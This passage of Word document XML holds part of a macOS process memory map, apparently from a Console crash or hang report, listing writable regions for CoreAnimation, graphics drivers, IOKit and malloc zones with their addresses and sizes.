        <w:t xml:space="preserve">CoreUI image data      000000010c49f000-000000010c4c8000 [  164K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c4c8000-000000010c51f000 [  348K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c6d1000-000000010cbfe000 [ 5300K] rw-/rwx SM=COW  ...rary/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/Resources/Extras2.rsrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010cbff000-000000010cc02000 [   12K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">VM_ALLOCATE            000000010cc02000-000000010cc04000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Memory Tag 242         000000010cc04000-000000010cc07000 [   12K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Swift metadata         000000010cc07000-000000010cc0f000 [   32K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">VM_ALLOCATE            000000010cc0f000-000000010cc11000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image file      000000010cc11000-000000010cc13000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CG image               000000010cc1a000-000000010cc1b000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cc1c000-000000010cc24000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cc26000-000000010cc2e000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cc30000-000000010cc34000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cc3e000-000000010cc42000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010cc49000-000000010cc4a000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cc4f000-000000010cc53000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010cc55000-000000010cc56000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cc5b000-000000010cc77000 [  112K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010cc77000-000000010cc79000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cc79000-000000010cc7d000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cc80000-000000010cc88000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cc89000-000000010cc8d000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010cc8d000-000000010cc8f000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cc8f000-000000010cc9a000 [   44K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">IOKit                  000000010cc9a000-000000010cc9b000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cc9b000-000000010ccaf000 [   80K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      000000010ccb3000-000000010ccbe000 [   44K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010ccbe000-000000010ccc2000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010ccc6000-000000010ccca000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010ccd4000-000000010ccdc000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010ccdd000-000000010cce9000 [   48K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010ccef000-000000010ccf1000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010ccf2000-000000010ccfa000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010ccfb000-000000010ccff000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      000000010ccff000-000000010cd01000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010cd01000-000000010cd03000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cd03000-000000010cd1b000 [   96K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cd1f000-000000010cd4a000 [  172K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010cd51000-000000010cd52000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          000000010cd52000-000000010cd81000 [  188K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cd85000-000000010cd9d000 [   96K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cd9e000-000000010cdb2000 [   80K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010cdb2000-000000010cdb4000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cdb4000-000000010cdb8000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cdbf000-000000010cdff000 [  256K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010ce0f000-000000010ce11000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010ce11000-000000010ce15000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC_LARGE           000000010ce15000-000000010ce3e000 [  164K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010ce3e000-000000010ce56000 [   96K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010ce59000-000000010ce5a000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010ce5a000-000000010ce5e000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC_LARGE           000000010ce5f000-000000010d06b000 [ 2096K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010d06b000-000000010d06f000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010d06f000-000000010d072000 [   12K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          000000010d072000-000000010d076000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010d07a000-000000010d07c000 [    8K] rw-/rwx SM=ZER  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010d07e000-000000010d07f000 [    4K] rw-/rwx SM=ZER  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010d07f000-000000010d083000 [   16K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 000000010d22a000-000000010d22c000 [    8K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Resources/GLEngine.bundle/GLEngine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 000000010d22c000-000000010d22d000 [    4K] rw-/rwx SM=PRV  /System/Library/Frameworks/OpenGL.framework/Versions/A/Resources/GLEngine.bundle/GLEngine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 000000010d3de000-000000010d3e8000 [   40K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLProgrammability.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 000000010d3e8000-000000010d3ea000 [    8K] rw-/rwx SM=NUL  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLProgrammability.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 000000010dbf6000-000000010dc70000 [  488K] rw-/rwx SM=COW  /System/Library/Extensions/AppleIntelBDWGraphicsGLDriver.bundle/Contents/MacOS/AppleIntelBDWGraphicsGLDriver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 000000010dc70000-000000010dc75000 [   20K] rw-/rwx SM=PRV  /System/Library/Extensions/AppleIntelBDWGraphicsGLDriver.bundle/Contents/MacOS/AppleIntelBDWGraphicsGLDriver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 000000010de3c000-000000010de3d000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Resources/GLRendererFloat.bundle/GLRendererFloat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 000000010dec3000-000000010df2a000 [  412K] rw-/rwx SM=COW  /System/Library/Extensions/AppleIntelBDWGraphicsMTLDriver.bundle/Contents/MacOS/AppleIntelBDWGraphicsMTLDriver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 000000010df2a000-000000010df2c000 [    8K] rw-/rwx SM=PRV  /System/Library/Extensions/AppleIntelBDWGraphicsMTLDriver.bundle/Contents/MacOS/AppleIntelBDWGraphicsMTLDriver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  000000010df6e000-000000010df7a000 [   48K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  000000010df7b000-000000010df7c000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>VM_ALLOCATE            000000010df7c000-000000010df7e000 [    8K] rw-/rwx SM=COW  x-alloc_0x7fbdb085c800</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  000000010df82000-000000010dfc2000 [  256K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010dfc2000-000000010dfd2000 [   64K] rw-/rwx SM=PRV  /private/var/folders/fv/1m56tx611tb28kv27w07st6r0000gn/C/com.apple.Console/com.apple.metal/libraries.data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010dfd2000-000000010dfe2000 [   64K] rw-/rwx SM=PRV  ...x611tb28kv27w07st6r0000gn/C/com.apple.Console/com.apple.metal/Intel(R) Iris(TM) Graphics 6100/functions.data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>VM_ALLOCATE            000000010dfe2000-000000010dfe3000 [    4K] rw-/rwx SM=PRV  x-alloc_0x7fbdb085c800</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  000000010dfe4000-000000010dfe6000 [    8K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>VM_ALLOCATE            000000010dfe6000-000000010dfe7000 [    4K] rw-/rwx SM=PRV  x-alloc_0x7fbdb085c800</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image file      000000010dff7000-000000010dff9000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC metadata        000000010dffa000-000000010dffb000 [    4K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Swift metadata         000000010dffb000-000000010dffc000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  000000010dffc000-000000010e233000 [ 2268K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Accelerate framework   000000010e233000-000000010e253000 [  128K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC_LARGE (empty)   000000010e253000-000000010e2c2000 [  444K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010e2c2000-000000010e2df000 [  116K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      000000010e2df000-000000010e2f8000 [  100K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010e2ff000-000000010e31c000 [  116K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          000000010e330000-000000010f32c000 [ 16.0M] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC metadata        000000010f481000-000000010f496000 [   84K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC metadata        000000010f498000-000000010f4ad000 [   84K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010f4ae000-000000010f720000 [ 2504K] rw-/rwx SM=COW  /System/Library/Fonts/Helvetica.dfont</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 000000010f768000-000000010f775000 [   52K] rw-/rwx SM=COW  ...ions/Xcode.app/Contents/Developer/Library/PrivateFrameworks/CoreSimulator.framework/Versions/A/CoreSimulator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Swift metadata         000000010f78f000-000000010f794000 [   20K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">VM_ALLOCATE            000000010f794000-000000010f795000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010f795000-000000010f797000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">VM_ALLOCATE            000000010f797000-000000010f798000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010f799000-000000010f79a000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Swift metadata         000000010f79c000-000000010f79f000 [   12K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Foundation             000000010f7a9000-000000010f7aa000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Swift metadata         000000010f7ab000-000000010f7ac000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Swift metadata         000000010f7ad000-000000010f7b1000 [   16K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010f7b1000-000000010f7b9000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010f7b9000-000000010f7ba000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010f7bb000-000000010f7bc000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010f9c6000-000000010f9cb000 [   20K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  000000010f9cb000-000000010f9cc000 [    4K] rw-/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010f9cc000-000000010f9cd000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC metadata        000000010f9d1000-000000010f9d2000 [    4K] rw-/rwx SM=COW  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000010f9d3000-000000010f9d4000 [    4K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MALLOC_LARGE metadata  000000010f9d4000-000000010f9d5000 [    4K] rw-/rwx SM=PRV  DefaultPurgeableMallocZone_0x10f9d0000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010f9d5000-000000010f9dd000 [   32K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010f9e2000-000000010f9e6000 [   16K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
